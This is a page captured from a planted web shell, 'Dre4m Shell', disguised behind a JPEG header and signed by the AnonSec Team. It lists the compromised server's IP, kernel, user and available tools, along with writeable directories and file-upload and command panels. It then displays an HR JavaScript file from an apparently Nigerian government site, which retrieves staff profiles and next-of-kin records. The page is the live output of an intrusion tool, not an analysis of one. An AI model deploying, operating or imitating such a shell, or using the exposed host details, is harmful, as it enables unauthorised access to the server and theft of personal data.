ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.137.219.117
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/grp.nicn.gov.ng/public/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/grp.nicn.gov.ng/public/assets/js/my-hr.js
function showAll() {
  $.ajax({
  url: murl +'/profile/searchUser/showAll',
  type: "post",
  data: {'nameID': $('#nameID').val(), '_token': $('input[name=_token]').val()},
  success: function(data){
    $('#nextofkinHref').attr('href', ""+murl+"/update/next-of-kin/" + data[0].fileNo ); //next of kin url

    //fileNo = data[0].fileNo;
    $('#fullName').html(data[0].surname+', '+data[0].first_name);
    $('#fileNo').html(data[0].fileNo);
    $('#image').attr('src', murl+'/passport/'+data.fileNo+'.jpg');
    $('#surname').html(data[0].surname);
    $('#first_name').html(data[0].first_name);
    $('#othernames').html(data[0].othernames);
    $('#decoration').html(data[0].title);
    //
    if(typeof data[0].fullname != 'undefined' || data[0].fullname != null)
    {
      $('#nextofkinName1').html(data[0].fullname);
      $('#nextofkinAddr1').html(data[0].address);
      $('#nextofkinRelationship1').html(data[0].relationship);
    }
    if(typeof data[1].fullname != 'undefined' || data[1].fullname != null)
    {
      $('#nextofkinName2').html(data[1].fullname);
      $('#nextofkinAddr2').html(data[1].address);
      $('#nextofkinRelationship2').html(data[1].relationship);
    }    
    
  }
})  //end of first ajax call for profile
} //end of function showAll

Anon7 - 2022
AnonSec Team